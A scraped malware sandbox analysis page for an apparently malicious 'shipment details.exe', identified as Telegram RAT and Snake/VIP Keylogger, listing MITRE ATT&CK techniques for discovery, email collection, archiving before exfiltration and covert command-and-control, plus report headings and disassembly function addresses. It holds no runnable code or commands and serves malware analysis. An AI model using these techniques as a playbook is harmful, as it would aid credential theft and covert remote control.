Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report shipment details.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
shipment details.exe

Function 05E08BC0 Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Function 00CFCAB1 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Function 00CFCAC0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 00CFA428 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 05E06182 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Function 00CFCD00 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 00CFCD08 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 05E06F70 Relevance: 1.6, APIs: 1, Instructions: 55
windowCOMMON

Function 05E09180 Relevance: 1.6, APIs: 1, Instructions: 53
windowCOMMON

Function 00CFA618 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 05E087EC Relevance: 1.5, APIs: 1, Instructions: 46
windowCOMMON

Function 013329EC Relevance: 5.5, Strings: 4, Instructions: 490
COMMON

Function 01337118 Relevance: 5.3, Strings: 4, Instructions: 337
COMMON

Function 013369A0 Relevance: 3.0, Strings: 2, Instructions: 514
COMMON

Function 0133C147 Relevance: 2.7, Strings: 2, Instructions: 227
COMMON

Function 01335362 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre